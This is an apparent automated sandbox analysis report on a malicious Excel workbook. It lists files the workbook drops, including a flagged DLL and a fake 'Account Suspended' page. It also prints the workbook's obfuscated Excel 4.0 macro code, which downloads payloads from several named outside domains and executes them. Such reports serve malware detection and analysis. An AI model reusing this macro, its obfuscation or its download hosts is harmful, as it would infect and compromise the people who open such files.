SSDEEP:	12:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tA9Djt11q39Djtx/hHg9Djtx/o:QjHSUjb1PKjb1tl6tMjb1qRj7+j7o
MD5:	9D59A2CB3DCB000AE6C14F9E9899CB87
SHA1:	17951CC23CE28AFCFD9709AFBDDDD5C575078ABE
SHA-256:	F7C17AC0FD185B8D127CBFCA08F430ACD9A16CE46310C2F6D3A2A2377753E583
SHA-512:	5744AB3DA830BCAF6110C1B2064DE15DDA5EA7C7E793E55834554BAD596F82B35D9033B98177018DC0BDABE1BDB37AB66E5DD34BC536E2D81E7FB548D93F6A92
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404.bing.com/.1024.1497582336.30956384.615499783.30878005..SRCHHPGUSR.SRCHLANGV2=en.bing.com/.1024.1497582336.30956384.615499783.30878005..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Q2XM1KA7.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.395792390410211
Encrypted:	false
SSDEEP:	3:eGp5bR4XgVBUVXJUOHjW2GWdR0g6zMksJcX05HjW2GWdR11o:LLt4NVXDjuWTZ6zMgXUjuWT11o
MD5:	8A9DF5CFF984C0B3237C523E2FF7EFCA
SHA1:	B7CE955AE13C48C8878F53319220A87CB0504C21
SHA-256:	61A60B7FF84C270DEC7090C59F6A6992527D9ABB7C493C2CEAD314BE1422C293
SHA-512:	7B18081C9D987D8DA99911C74530FBD78EC44B71F4EC39C131685D2F195B7B3AD4004348A4AE86C7561098BD79897386A1FF8E91E95F5A5EF644C197B95C7FAA
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\QF6S0IOS.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	424
Entropy (8bit):	4.701405283805101
Encrypted:	false
SSDEEP:	12:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tA9Djt11q39Djtx/o:QjHSUjb1PKjb1tl6tMjb1qRj7o
MD5:	334F95DAEB29460EB084FE242C5DD73D
SHA1:	8531CC011E38A8ABF0AF1DDC8EC2A04B39F36B67
SHA-256:	57D71F4D56851A90F044C9BED45C21C23229197E92A3EBC74A87FE7DE8AF625C
SHA-512:	80D7BB0F81EE1B64B7D3BF2743EDEC5D024586E541144D75A35DF2664486AB1F4AE2B79FF605725E48E82C8A1E5A08C8917F8AE0E5BF0B463BCEC2A4B40A19A4
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404.bing.com/.1024.1497582336.30956384.615499783.30878005.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SEWV21QJ.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	871
Entropy (8bit):	5.321014202250298
Encrypted:	false
SSDEEP:	24:QjHSUjb1PKjb1tl6tMjb1qJlhS4c5Fpc5/c5AWSbUDQEP+:QjHSUjbFKjbHlxjba5aaoSoDNm
MD5:	6B8621B0663358A3018BCC198B251998
SHA1:	B33D60B8B444B6BF8FABAB3BDD8112569939D9E9
SHA-256:	B20BC31F8D8B6AE927D17DD0CD65428E52F38AA7A69EE044A6DA55D445F7CF45
SHA-512:	83A5F00BD6472C51BC80179CEB683B9900BA0D39EE536F53CBD5E6ACD4CAF6A258F3CFE4F4CB2AB1DD42239AA333A5823072529A038E791BF785C39C467A5535
Malicious:	false
IE Cache URL:	bing.com/
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404&T=1617496238000.bing.com/.1088.3255035136.30956459.625352800.30878005..SRCHHPGUSR.SRCHLANGV2=en.bing.com/.1024.1507582336.30956384.627249804.30878005.._HPVN.CS=eyJQbiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiUCJ9LCJTYyI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiSCJ9LCJReiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiVCJ9LCJBcCI6dHJ1ZSwiTXV0ZSI6dHJ1ZSwiTGFkIjoiMjAyMS0wNC0wNFQwMDowMDowMFoiLCJJb3RkIjowLCJEZnQiOm51bGwsIk12cyI6MCwiRmx0IjowLCJJbXAiOjF9.bing.com/.1024.1507582336.30956384.627561805.30878005.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UMFOMLUW.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	99
Entropy (8bit):	4.4217654003116476
Encrypted:	false
SSDEEP:	3:e7qp5bR4XgVaLrcX05HjW2GWdR11o:WqLt4eXUjuWT11o
MD5:	5DB7D1C7FFA26769FC150B68FDE3A9DE
SHA1:	B347AFE5BCCC230F30CEA62B665ACC7940D5D20E
SHA-256:	AECB2EBA87F1C0123DBBE32EA897A76EE57B3B9A71C774FCECD45B24214D5507
SHA-512:	77046C6D79BAB38525B67A68674BF390562716C006A3CB485078837171339934EFDD35713751AB2BAD80E84BA9E2C6E96D8C683C68BCC55E98ADBEE27E2FA508
Malicious:	false
IE Cache URL:	www.bing.com/
Preview:	MUIDB.099651EE0C2061E9079E41E10DF7608B.www.bing.com/.9216.1497582336.30956384.615343783.30878005.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VZXEQH0B.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	537
Entropy (8bit):	4.762642213497225
Encrypted:	false
SSDEEP:	12:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tA9Djt11qjLtb8RWb/:QjHSUjb1PKjb1tl6tMjb1qJ8R+/
MD5:	0F24EA4078F90ED3EB7AA00D83401C0B
SHA1:	4F82B6166C8FFF0432045CFAE2F52004F4148300
SHA-256:	330FE76617E5175280CAE06D348015F75D850563B53EACC113053BD022A9D3D3
SHA-512:	7A3C765D4D9DC719F76D9684B6C91E1E6611DE755AC5DF4E65253F4DF9BBEE9F83AA290C0FF7C5AA35F32BA9A41A8FC3650D56067C19990A4EADE55663882B9D
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404&T=1617496238000.bing.com/.1088.3255035136.30956459.625352800.30878005..SRCHHPGUSR.SRCHLANGV2=en&WTS=63753093038.bing.com/.1088.3255035136.30956459.627093804.30878005..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y9VF2UL4.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	521
Entropy (8bit):	4.758344520430346
Encrypted:	false
SSDEEP:	12:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tA9Djt11qjLtbQHg9BtPy:QjHSUjb1PKjb1tl6tMjb1qJlhy
MD5:	429D230A5D0A4CF7E01710675CCA7997
SHA1:	7EDF4096537782343E5EB2D4C9D8F6DE7AFACDE1
SHA-256:	F344345DBC0E5DCEB8D555033BC18E416B5938AAAFAE7FACC63B22E6FFD658AA
SHA-512:	C3C78153AA4C767A7757576FD755FDD09BE1AB033DC792824E1DEA22ED8154DE002D8C4D5585EF0915B11C4A3BFD8FC8130BDE0FC48B69116E0EC1C8E4328481
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404&T=1617496238000.bing.com/.1088.3255035136.30956459.625352800.30878005..SRCHHPGUSR.SRCHLANGV2=en.bing.com/.1024.1507582336.30956384.627249804.30878005..

C:\Users\user\Desktop\19CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	234340
Entropy (8bit):	5.681216984287049
Encrypted:	false
SSDEEP:	3072:CbmxIEudkLee/DPPjwwm+DS7+DXfbmxIEudkLe4:/IEudkLee7nvDSqDX4IEudkLe4
MD5:	F2E05811C1AD85BB311E235A9DDFD48E
SHA1:	AA6EABD4E268CFB5F57C2D9634264B6F9D1F9128
SHA-256:	D4E3C6C2ED3D2C0D183FB94A18C380112D17CA35B281A289AEA5FDC60408BDC3
SHA-512:	082C8768E37F972393F435750D40074CB7FBAAA7F6833A02F30D07322E57314976114DF32C2ECCD626ADF99525A37872B9E25314B4688A51A6901BA127FF0A12
Malicious:	false
Preview:	........g2..........................\.p.... B.....a.........=...............................................=.....i..9!.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......4...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1...................C.a.l.i.b.r.i.1.......>...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................A.r.i.a.l.1...............

C:\Users\user\fikftkm.thj Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	7614
Entropy (8bit):	5.643196429180972
Encrypted:	false
SSDEEP:	192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
MD5:	116091ED739B7E0F1AD7F819560A0602
SHA1:	C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
SHA-256:	0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
SHA-512:	83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
Malicious:	true
Preview:	<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

C:\Users\user\fikftkm.thj2 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	107396
Entropy (8bit):	5.804743169573023
Encrypted:	false
SSDEEP:	1536:DWKaY5Se9WnVI78XvnoxJasJvRHKmyGDvDk0Rt9Y56l5ZMpvV05o9OX5xPw8:DWa0eQnVI7qCqZGDvDk4wol5w0EU
MD5:	B6FBFC6A40ED69565C2B1A2E4AABD201
SHA1:	432FF10BD10DB7494D0B2605DEA26C54F8238064
SHA-256:	A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
SHA-512:	4BB5E232EFCD233ABA7804A8A3E3F901AFCD89CF82C94A93AE3E5FEDD2F3DE04CCF5A9F45CEC82D622F8A2740DE4B4CF7FA5155D60851C7C6E762A63CE70E909
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: document-69564892.xls, Detection: malicious, Browse Filename: document-1320073816.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!.....Z...........`.......p.......................................................................p..Q...P...d.......................................................................................P............................code...fY.......Z.................. ..`.data...Q....p.......^..............@..@.rdata.._L...........`...................data...P............x..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 1 10:53:30 2021, Security: 0
Entropy (8bit):	5.512374199664274
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	document-1370071295.xls
File size:	184832
MD5:	09d41d14738707c2ce1e28b2313e1e5c
SHA1:	5714bc70d7d24c3db8c939c89fcea4b1d62736df
SHA256:	4844dc6311611acbba6d5afd762bcee79e3b4a5cc0d3d89b0ddc9c486f7b8d5e
SHA512:	1cfa4bf99fba33ec9a35a3ee8985650e5d6d3b836fb5fab72254752de16b501e90171829518a2307170669f38fa54af3510ed4e2555f626d2df01f56181d40c7
SSDEEP:	1536:4PrixIEudkLeXf1D5XUY//wBf8orsYwbKynDLmAMo5VjP2/zaUZ:4PmxIEudkLeXPD/PjYwe2DMo3S/l
File Content Preview:	........................>.......................g...........................d...e...f..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "document-1370071295.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-04-01 09:53:30
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.354263933307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 3 . . . . . D o c 1 . . . . . D o c 2 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b0 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.251653152424
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 173850

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	173850
Entropy:	5.72116035247
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 ! . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 04 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,=CHAR(85),,,,=CHAR(74),,=CHAR(114),,=CHAR(44),,,,,,=CHAR(82),,,,=CHAR(74),,=CHAR(117),,=CHAR(68),,,,,,=CHAR(76),,,,=CHAR(67),,=CHAR(110),,=CHAR(108),,,,,,=CHAR(77),,,,=CHAR(67),,=CHAR(100),,=CHAR(108)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)",,,,,,=CHAR(111),,,,=CHAR(66),,=CHAR(108),,=CHAR(82),,,,,,=CHAR(110),,,,=CHAR(66),,=CHAR(108),,=CHAR(101),,,,,,,,,,,,=CHAR(51),,=CHAR(103),,,,,,,,,,,,,,=CHAR(105),,,,,,,,,,,,,,=CHAR(115),,,,,,,,,,,,,,=CHAR(116)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=CALL(""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A200&Doc1!C200,Doc1!E201,0,0)",,,,,,,,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A201&Doc1!C201,Doc1!E201&""1"",0,0)",,,,,,,,,,,,,,=CHAR(114)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A202&Doc1!C202,Doc1!E201&""2"",0,0)",,,,,,=CHAR(40+45),,,,,,,,=CHAR(83)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A203&Doc1!C203,Doc1!E201&""3"",0,0)",,,,,,=CHAR(22+60),,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A204&Doc1!C204,Doc1!E201&""4"",0,0)",,,,,,=CHAR(6+70),,,,,,,,=CHAR(114)=Doc1!H206(),,,,,,,,,,,,,,=CHAR(118),,,,,,,,,,,,,,=CHAR(101),,,,,,,,,,,,,,=CHAR(114),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,h,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,,,,,,,,vts.us.com/ds/0104.,,gif,,,,,,,mundotecnologiasolar.com/ds/0104.,,gif,,..\fikftkm.thj,,,,,accesslinksgroup.com/ds/0104.,,gif,,,,,,,ponchokhana.com/ds/0104.,,gif,,,,,,,comosairdoburaco.com.br/ds/0104.,,gif,,,,,,,,,,,,,,,,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=EXEC(Doc2!CE2&Doc2!CE3&Doc2!CE4&Doc2!CE5&Doc2!CE6&Doc2!CE7&Doc2!CE8&""2 